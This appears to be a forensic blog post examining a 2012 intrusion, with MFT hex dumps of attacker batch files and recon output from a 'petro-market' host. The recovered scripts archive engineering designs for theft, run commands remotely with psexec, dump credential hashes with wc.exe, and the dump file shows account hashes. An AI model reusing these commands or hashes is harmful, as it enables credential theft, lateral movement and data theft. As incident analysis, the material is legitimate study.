00003a0: 4649 4c45 3000 0300 afd8 5b05 0000 0000 FILE0.....[.....
00003b0: 0300 0100 3800 0100 b001 0000 0004 0000 ....8...........
00003c0: 0000 0000 0000 0000 0400 0000 fd2e 0000 ................
00003d0: 0700 0000 0000 0000 1000 0000 6000 0000 ............`...
00003e0: 0000 0000 0000 0000 4800 0000 1800 0000 ........H.......
00003f0: 655b c338 3bcc cd01 7011 e20f 3ccc cd01 e[.8;...p...<...
0000400: 7011 e20f 3ccc cd01 7011 e20f 3ccc cd01 p...<...p...<...
0000410: 2000 0000 0000 0000 0000 0000 0000 0000 ...............
0000420: 0000 0000 1301 0000 0000 0000 0000 0000 ................
0000430: 0000 0000 0000 0000 3000 0000 7000 0000 ........0...p...
0000440: 0000 0000 0000 0200 5800 0000 1800 0100 ........X.......
0000450: 831d 0000 0000 0200 655b c338 3bcc cd01 ........e[.8;...
0000460: 655b c338 3bcc cd01 655b c338 3bcc cd01 e[.8;...e[.8;...
0000470: 655b c338 3bcc cd01 0000 0000 0000 0000 e[.8;...........
0000480: 0000 0000 0000 0000 2000 0000 0000 0000 ........ .......
0000490: 0b03 7300 7900 7300 7400 6500 6d00 3400 ..s.y.s.t.e.m.4.
00004a0: 2e00 6200 6100 7400 8000 0000 a000 0000 ..b.a.t.........
00004b0: 0000 1800 0000 0300 8300 0000 1800 0000 ................
00004c0: 4065 6368 6f20 6f66 6620 0d0a 633a 5c77 @echo off ..c:\w
00004d0: 696e 646f 7773 5c77 6562 7569 5c72 612e indows\webui\ra.
00004e0: 6578 6520 6120 2d68 7068 636c 6c6c 7364 exe a -hphclllsd
00004f0: 646c 7364 6964 646b 6c6c 6a68 202d 7220 dlsdiddklljh -r
0000500: 633a 5c77 696e 646f 7773 5c77 6562 7569 c:\windows\webui
0000510: 5c6e 6574 7374 6174 2e64 6c6c 2022 433a \netstat.dll "C:
0000520: 5c45 6e67 696e 6565 7269 6e67 5c44 6573 \Engineering\Des
0000530: 6967 6e73 5c50 756d 7073 2220 2d78 2a2e igns\Pumps" -x*.
0000540: 646c 6cff 8279 4711 ffff ffff 8279 4711 dll..yG.
70379080 Started 11/27/2012 4:30:00 AM
system5.bat being executed against IIS-SARIYADH-03
426451324 \WINDOWS\System32\svchost.exe - ps \\172.16.223.47 -accepteula -c c:\windows\webui\system5.bat
mft entry for system5.bat
00002f0: 0000 0000 0000 4649 4c45 3000 0300 3d66 ......FILE0...=f
0000300: 5c05 0000 0000 0400 0100 3800 0100 8001 \.........8.....
0000310: 0000 0004 0000 0000 0000 0000 0000 0400 ................
0000320: 0000 fe2e 0000 0400 0000 0000 0000 1000 ................
0000330: 0000 6000 0000 0000 0000 0000 0000 4800 ..`...........H.
0000340: 0000 1800 0000 e589 9246 3dcc cd01 4288 .........F=...B.
0000350: ce79 3dcc cd01 4288 ce79 3dcc cd01 4288 .y=...B..y=...B.
0000360: ce79 3dcc cd01 2000 0000 0000 0000 0000 .y=... .........
0000370: 0000 0000 0000 0000 0000 1301 0000 0000 ................
0000380: 0000 0000 0000 0000 0000 0000 0000 3000 ..............0.
0000390: 0000 7000 0000 0000 0000 0000 0200 5800 ..p...........X.
00003a0: 0000 1800 0100 831d 0000 0000 0200 e589 ................
00003b0: 9246 3dcc cd01 e589 9246 3dcc cd01 e589 .F=......F=.....
00003c0: 9246 3dcc cd01 e589 9246 3dcc cd01 0000 .F=......F=.....
00003d0: 0000 0000 0000 0000 0000 0000 0000 2000 .............. .
00003e0: 0000 0000 0000 0b03 7300 7900 7300 7400 ........s.y.s.t.
00003f0: 6500 6d00 3500 2e00 6200 6100 7400 8000 e.m.5...b.a.t...
0000400: 0000 7000 0000 0000 1800 0000 0300 5800 ..p...........X.
0000410: 0000 1800 0000 4065 6368 6f20 6f66 660d ......@echo off.
0000420: 0a63 6f70 7920 633a 5c77 696e 646f 7773 .copy c:\windows
0000430: 5c77 6562 7569 5c77 632e 6578 6520 633a \webui\wc.exe c:
0000440: 5c77 696e 646f 7773 5c73 7973 7465 6d33 \windows\system3
0000450: 320d 0a61 7420 3034 3a33 3020 7763 2e65 2..at 04:30 wc.e
0000460: 7865 202d 6520 2d6f 2068 2e6f 7574 ffff xe -e -o h.out..
0000470: ffff 8279 4711 0000 0000 0000 0000 0000 ...yG
000260: 4649 4c45 3000 0300 e654 5d05 0000 0000 FILE0....T].....
0000270: 0500 0100 3800 0100 3002 0000 0004 0000 ....8...0.......
0000280: 0000 0000 0000 0000 0300 0000 022f 0000 ............./..
0000290: 0500 0000 0000 0000 1000 0000 6000 0000 ............`...
00002a0: 0000 0000 0000 0000 4800 0000 1800 0000 ........H.......
00002b0: 6168 88b7 3ecc cd01 6168 88b7 3ecc cd01 ah..>...ah..>...
00002c0: 6168 88b7 3ecc cd01 6168 88b7 3ecc cd01 ah..>...ah..>...
00002d0: 2000 0000 0000 0000 0000 0000 0000 0000 ...............
00002e0: 0000 0000 c806 0000 0000 0000 0000 0000 ................
00002f0: 0000 0000 0000 0000 3000 0000 6800 0000 ........0...h...
0000300: 0000 0000 0000 0200 4c00 0000 1800 0100 ........L.......
0000310: 1d00 0000 0000 0100 6168 88b7 3ecc cd01 ........ah..>...
0000320: 6168 88b7 3ecc cd01 6168 88b7 3ecc cd01 ah..>...ah..>...
0000330: 6168 88b7 3ecc cd01 0000 0000 0000 0000 ah..>...........
0000340: 0000 0000 0000 0000 2000 0000 0000 0000 ........ .......
0000350: 0503 6800 2e00 6f00 7500 7400 0000 0000 ..h...o.u.t.....
0000360: 8000 0000 2801 0000 0000 1800 0000 0100 ....(...........
0000370: 0c01 0000 1800 0000 616d 6972 733a 5045 ........amirs:PE
0000380: 5452 4f2d 4d41 524b 4554 3a46 3243 3645 TRO-MARKET:F2C6E
0000390: 4644 3337 4231 3034 4344 3731 4439 3141 FD37B104CD71D91A
00003a0: 3038 3144 3442 3337 3836 313a 3734 3444 081D4B37861:744D
00003b0: 3041 3632 3737 3737 3642 3436 4634 4242 0A6277776B46F4BB
00003c0: 3744 3044 3732 3343 3545 4444 0d0a 464c 7D0D723C5EDD..FL
00003d0: 442d 5341 5249 5941 4448 2d34 3324 3a50 D-SARIYADH-43$:P
00003e0: 4554 524f 2d4d 4152 4b45 543a 3030 3030 ETRO-MARKET:0000
00003f0: 3030 3030 3030 3030 3030 3030 3030 3030 0000000000000000
0000400: 3030 3030 3030 3030 3030 3030 3a44 3332 000000000000:D32
0000410: 3341 3043 4243 3532 3037 3330 4237 3446 3A0CBC520730B74F
0000420: 4331 3839 3544 3533 3346 4534 330d 0a73 C1895D533FE43..s
0000430: 7973 6261 636b 7570 3a63 7572 7265 6e74 ysbackup:current
0000440: 3a43 3241 3339 3135 4446 3245 4337 3945 :C2A3915DF2EC79E
0000450: 4537 3331 3038 4542 3438 3037 3341 4342 E73108EB48073ACB
0000460: 373a 4537 4136 4632 3730 4631 4241 3536 7:E7A6F270F1BA56
0000470: 3241 3930 4532 4331 3333 4139 3544 3230 2A90E2C133A95D20
0000480: 3537 0d0a 0000 0000 ffff ffff 8279 4711 57...........yG.
00002f0: 0000 0000 0000 4649 4c45 3000 0300 09a3 ......FILE0.....
0000300: 5a05 0000 0000 0300 0100 3800 0100 e001 Z.........8.....
0000310: 0000 0004 0000 0000 0000 0000 0000 0300 ................
0000320: 0000 fa2e 0000 0500 0000 0000 0000 1000 ................
0000330: 0000 6000 0000 0000 0000 0000 0000 4800 ..`...........H.
0000340: 0000 1800 0000 add9 9741 38cc cd01 add9 .........A8.....
0000350: 9741 38cc cd01 add9 9741 38cc cd01 add9 .A8......A8.....
0000360: 9741 38cc cd01 2000 0000 0000 0000 0000 .A8... .........
0000370: 0000 0000 0000 0000 0000 1301 0000 0000 ................
0000380: 0000 0000 0000 0000 0000 0000 0000 3000 ..............0.
0000390: 0000 7000 0000 0000 0000 0000 0200 5800 ..p...........X.
00003a0: 0000 1800 0100 1c00 0000 0000 0100 add9 ................
00003b0: 9741 38cc cd01 add9 9741 38cc cd01 add9 .A8......A8.....
00003c0: 9741 38cc cd01 add9 9741 38cc cd01 0000 .A8......A8.....
00003d0: 0000 0000 0000 0000 0000 0000 0000 2000 .............. .
00003e0: 0000 0000 0000 0b03 7300 7900 7300 7400 ........s.y.s.t.
00003f0: 6500 6d00 3600 2e00 6200 6100 7400 8000 e.m.6...b.a.t...
0000400: 0000 d000 0000 0000 1800 0000 0100 b800 ................
0000410: 0000 1800 0000 4065 6368 6f20 6f66 660d ......@echo off.
0000420: 0a69 7063 6f6e 6669 6720 2f61 6c6c 203e .ipconfig /all >
0000430: 3e20 633a 5c77 696e 646f 7773 5c77 6562 > c:\windows\web
0000440: 7569 5c73 7973 7465 6d2e 646c 6c0d 0a6e ui\system.dll..n
0000450: 6574 2073 6861 7265 203e 3e20 633a 5c77 et share >> c:\w
0000460: 696e 646f 7773 5c77 6562 7569 5c73 7973 indows\webui\sys
0000470: 7465 6d2e 646c 6c0d 0a6e 6574 2073 7461 tem.dll..net sta
0000480: 7274 203e 3e20 633a 5c77 696e 646f 7773 rt >> c:\windows
0000490: 5c77 6562 7569 5c73 7973 7465 6d2e 646c \webui\system.dl
00004a0: 6c0d 0a6e 6574 2076 6965 7720 3e3e 2063 l..net view >> c
00004b0: 3a5c 7769 6e64 6f77 735c 7765 6275 695c :\windows\webui\
00004c0: 7379 7374 656d 2e64 6c6c 0d0a 0d0a ffff system.dll......
00004d0: ffff 8279 4711 0000 0000 0000 0000 0000 ...yG.
Data collected from host script
365846561 Host Name . . . . . . . . . . . . : fld-sariyadh-43
365846623 Primary Dns Suffix . . . . . . . : petro-market.org
365846686 Node Type . . . . . . . . . . . . : Hybrid
365846739 IP Routing Enabled. . . . . . . . : No
365846788 WINS Proxy Enabled. . . . . . . . : No
365846837 DNS Suffix Search List. . . . . . : petro-market.org
365846903 Ethernet adapter Local Area Connection:
365846948 Connection-specific DNS Suffix . :
365846995 Description . . . . . . . . . . . : AMD PCNET Family PCI Ethernet Adapter
365847079 Physical Address. . . . . . . . . : 00-0C-29-A7-7C-6E
365847143 Dhcp Enabled. . . . . . . . . . . : No
365847192 IP Address. . . . . . . . . . . . : 172.16.223.187
365847253 Subnet Mask . . . . . . . . . . . : 255.255.255.0
365847313 Default Gateway . . . . . . . . . : 172.16.223.8
365847372 DNS Servers . . . . . . . . . . . : 172.16.150.10
365847432 Primary WINS Server . . . . . . . : 172.16.223.47
365847492 Server Name Remark
365847525 -------------------------------------------------------------------------------
365847606 \\DC-USTXHOU
365847687 \\ENG-USTXHOU-148
365847768 \\FLD-SARIYADH-43
365847849 \\IIS-SARIYADH-03
365847930 The command completed successfully.
365847969 Alias name administrators
365848000 Comment Administrators have complete and unrestricted access to the computer/domain
365848094 Members
365848105 -------------------------------------------------------------------------------
365848186 Administrator
365848201 Amir
365848207 PETRO-MARKET\amirs
365848227 PETRO-MARKET\Domain Admins
365848255 sysbackup
365848266 The command completed successfully.
365848305 There are no entries in the list.
365848344 Share name Resource Remark
365848399 -------------------------------------------------------------------------------
365848480 ADMIN$ C:\WINDOWS Remote Admin
365848561 C$ C:\ Default share
365848642 IPC$ Remote IPC
365848723 The command completed successfully.
365848762 These Windows services are started:
365848801 Application Layer Gateway Service
365848839 Automatic Updates
365848861 COM+ Event System
365848883 Computer Browser
365848904 Cryptographic Services
365848931 DCOM Server Process Launcher
365848964 DHCP Client
365848980 Distributed Link Tracking Client
365849017 DNS Client
365849032 Error Reporting Service
365849060 Event Log
365849060 Event Log
365849074 Help and Support
365849095 IPSEC Services
365849114 Logical Disk Manager
365849139 Microsoft Device Manager
365849168 Net Logon
365849182 Network Connections
365849206 Network Location Awareness (NLA)
365849243 Plug and Play
365849261 Print Spooler
365849279 Protected Storage
365849301 Remote Access Connection Manager
365849338 Remote Procedure Call (RPC)
365849370 Remote Registry
365849390 Secondary Logon
365849410 Security Accounts Manager
365849440 Server
365849451 Shell Hardware Detection
365849480 SSDP Discovery Service
365849507 System Event Notification
365849537 System Restore Service
365849564 Task Scheduler
365849583 TCP/IP NetBIOS Helper
365849609 Telephony
365849623 Terminal Services
365849645 Themes
365849656 WebClient
365849670 Windows Audio
365849688 Windows Firewall/Internet Connection Sharing (ICS)
365849743 Windows Management Instrumentation
365849782 Windows Time
365849799 Wireless Zero Configuration
365849831 Workstation
365849849 The command completed successfully.
365849888 Scan of 254 IPs started at Tue Nov 27 03:22:59 2012
365849943 -------------------------------------------------------------------------------
365850024 172.16.223.8
365850038 Responded in 0 ms.
365850058 0 hops away
365850071 Responds with ICMP unreachable: No
365850107 TCP ports: 21 80
365850129 TCP 21:
365850138 [220 (vsFTPd 2.3.0)]
365850162 TCP 80:
365850171 [HTTP/1.1 200 OK Date: Tue, 27 Nov 2012 00:23:08 GMT Server: Apache/2.2.16 (Ubuntu) Last-Modified: Fri, 23 Nov 2012 15:06:45 GMT ETag: "2194f-b1-4cf2aee9810d2]
365850334 -------------------------------------------------------------------------------
365850415 172.16.223.47
365850430 Responded in 0 ms.
365850450 0 hops away
365850463 Responds with ICMP unreachable: No
365850499 TCP ports: 80 445
365850522 TCP 80:
365850531 [HTTP/1.1 200 OK Content-Length: 1433 Content-Type: text/html Content-Location: http://172.16
No comments:
Post a Comment